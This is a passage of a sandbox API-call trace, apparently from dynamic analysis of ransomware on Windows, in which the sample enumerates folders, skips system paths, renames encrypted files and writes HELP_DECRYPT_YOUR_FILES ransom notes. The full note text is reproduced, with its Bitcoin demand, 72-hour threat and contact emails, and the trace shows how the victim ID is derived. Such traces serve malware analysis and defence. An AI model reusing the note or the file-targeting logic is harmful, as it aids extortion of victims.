	[0166.038] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b59e815, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7b59e815, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7b5c4ea5, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x5230, dwReserved0=0x2a005c, dwReserved1=0x2a002e, cFileName="masterdescriptor.x-none.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="MASTER~1.SCL")) returned 1
	[0166.038] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5876774, ftCreationTime.dwHighDateTime=0x1d8a64a, ftLastAccessTime.dwLowDateTime=0xd5876774, ftLastAccessTime.dwHighDateTime=0x1d8a64a, ftLastWriteTime.dwLowDateTime=0x341a3500, ftLastWriteTime.dwHighDateTime=0x1d0d7f0, nFileSizeHigh=0x0, nFileSizeLow=0x66, dwReserved0=0x2a005c, dwReserved1=0x2a002e, cFileName="s320.hash", cAlternateFileName="S320~1.HAS")) returned 1
	[0166.039] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7bf27f26, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7bf27f26, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7c5c46e7, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x38b5d0, dwReserved0=0x2a005c, dwReserved1=0x2a002e, cFileName="stream.x86.x-none.man.dat.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="STREAM~1.SCL")) returned 1
	[0166.039] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7bf27f26, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7bf27f26, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7c5c46e7, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x38b5d0, dwReserved0=0x2a005c, dwReserved1=0x2a002e, cFileName="stream.x86.x-none.man.dat.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="STREAM~1.SCL")) returned 0
	[0166.039] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0166.039] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0166.039] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd584b1e3, ftCreationTime.dwHighDateTime=0x1d8a64a, ftLastAccessTime.dwLowDateTime=0xd587b51b, ftLastAccessTime.dwHighDateTime=0x1d8a64a, ftLastWriteTime.dwLowDateTime=0xd587b51b, ftLastWriteTime.dwHighDateTime=0x1d8a64a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="x-none.16", cAlternateFileName="")) returned 0
	[0166.040] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0166.041] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0166.041] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7830abfa, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7830abfa, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7830abfa, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x7c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="deploymentconfig.0.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="DEPLOY~1.SCL")) returned 1
	[0166.041] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78357355, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x78357355, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7837df78, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x7c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="deploymentconfig.1.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="DEPLOY~2.SCL")) returned 1
	[0166.041] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x783a3616, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x783a3616, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x783c99ba, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x570, dwReserved0=0x0, dwReserved1=0x0, cFileName="deploymentconfig.2.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="DEPLOY~3.SCL")) returned 1
	[0166.041] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x783f0278, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x783f0278, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x78415fc7, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0166.041] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x783c99ba, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x783c99ba, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x783f0278, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0166.042] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c4bfed4, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1d7a4d6f, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1da7a7ac, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MachineData", cAlternateFileName="MACHIN~1")) returned 1
	[0166.042] lstrcmpW (lpString1="MachineData", lpString2="..") returned 1
	[0166.042] lstrcmpW (lpString1="MachineData", lpString2=".") returned 1
	[0166.042] lstrcpyW (in: lpString1=0x18b58c, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun"
	[0166.042] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\"
	[0166.042] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\", lpString2="MachineData" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData"
	[0166.042] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData"
	[0166.042] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\"
	[0166.042] lstrcpyW (in: lpString1=0x18a674, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\"
	[0166.043] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\*.*") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\*.*"
	[0166.043] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\*.*" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c4bfed4, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1d7a4d6f, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1da7a7ac, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0166.045] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\*.*") returned 55
	[0166.045] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0166.045] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\*.*", cchLength=0x37 | out: lpsz="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\*.*") returned 0x37
	[0166.045] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.045] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\*.*", lpSrch="windows") returned 0x0
	[0166.045] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.046] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\*.*", lpSrch="boot") returned 0x0
	[0166.046] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.046] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\*.*", lpSrch="system volume information") returned 0x0
	[0166.046] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.046] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0166.046] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.046] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\*.*", lpSrch="temp") returned 0x0
	[0166.047] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.047] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\*.*", lpSrch="program files") returned 0x0
	[0166.047] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.047] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\*.*", lpSrch="program files (x86)") returned 0x0
	[0166.047] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.048] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\*.*", lpSrch="appdata") returned 0x0
	[0166.048] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.048] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\*.*", lpSrch="application data") returned 0x0
	[0166.048] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.048] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\*.*", lpSrch="winnt") returned 0x0
	[0166.048] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.048] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\*.*", lpSrch="tmp") returned 0x0
	[0166.048] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.049] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\*.*", lpSrch="cache") returned 0x0
	[0166.049] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.049] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\*.*", lpSrch="temporary internet files") returned 0x0
	[0166.049] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.049] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\*.*", lpSrch="webcache") returned 0x0
	[0166.049] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.049] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\*.*", lpSrch="inetcache") returned 0x0
	[0166.050] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.050] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\*.*", lpSrch="nvidia") returned 0x0
	[0166.050] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.050] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\*.*", lpSrch="packages") returned 0x0
	[0166.050] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.050] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\*.*", lpSrch="cookies") returned 0x0
	[0166.050] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.051] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\*.*", lpSrch="programdata") returned 0x0
	[0166.051] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c4bfed4, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1d7a4d6f, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1da7a7ac, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0166.052] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d7a4d6f, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1d7a4d6f, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1d7a4d6f, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Catalog", cAlternateFileName="")) returned 1
	[0166.052] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1da7a7ac, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1da7a7ac, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1da7a7ac, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Integration", cAlternateFileName="INTEGR~1")) returned 1
	[0166.052] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1da7a7ac, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1da7a7ac, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1da7a7ac, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Integration", cAlternateFileName="INTEGR~1")) returned 0
	[0166.052] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0166.052] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0166.053] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData"
	[0166.053] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\*.*") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\*.*"
	[0166.053] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0166.053] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0166.053] wsprintfW (in: param_1=0x18a370, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\HELP_DECRYPT_YOUR_FILES.TXT") returned 79
	[0166.053] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0166.054] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0166.054] WriteFile (in: hFile=0x388, lpBuffer=0x189728*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18a64c, lpOverlapped=0x0 | out: lpBuffer=0x189728*, lpNumberOfBytesWritten=0x18a64c*=0xc46, lpOverlapped=0x0) returned 1
	[0166.057] CloseHandle (hObject=0x388) returned 1
	[0166.058] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1896f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1896f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0166.058] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0166.058] GetUserNameA (in: lpBuffer=0x1895dc, pcbBuffer=0x1896f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1896f4) returned 1
	[0166.059] wsprintfW (in: param_1=0x18a578, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0166.059] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0166.060] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0166.060] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0166.060] WriteFile (in: hFile=0x388, lpBuffer=0x18a578*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18a654, lpOverlapped=0x0 | out: lpBuffer=0x18a578*, lpNumberOfBytesWritten=0x18a654*=0x30, lpOverlapped=0x0) returned 1
	[0166.060] CloseHandle (hObject=0x388) returned 1
	[0166.061] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0166.061] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0166.061] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0166.061] wsprintfW (in: param_1=0x18a330, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\HELP_DECRYPT_YOUR_FILES.HTML") returned 80
	[0166.061] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0166.067] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0166.067] WriteFile (in: hFile=0x388, lpBuffer=0x189b24*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0x189b24*, lpNumberOfBytesWritten=0x18a648*=0x808, lpOverlapped=0x0) returned 1
	[0166.070] CloseHandle (hObject=0x388) returned 1
	[0166.070] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0166.071] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x189b0c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x189b0c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0166.071] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0166.071] GetUserNameA (in: lpBuffer=0x1899f0, pcbBuffer=0x189b08 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x189b08) returned 1
	[0166.073] wsprintfA (in: param_1=0x18a538, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0166.073] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0166.073] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0166.073] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0166.073] WriteFile (in: hFile=0x388, lpBuffer=0x18a538*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18a650, lpOverlapped=0x0 | out: lpBuffer=0x18a538*, lpNumberOfBytesWritten=0x18a650*=0x43, lpOverlapped=0x0) returned 1
	[0166.074] CloseHandle (hObject=0x388) returned 1
	[0166.074] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\*.*" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c4bfed4, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1d7a4d6f, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x7c83edb5, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0166.074] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\*.*") returned 55
	[0166.075] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
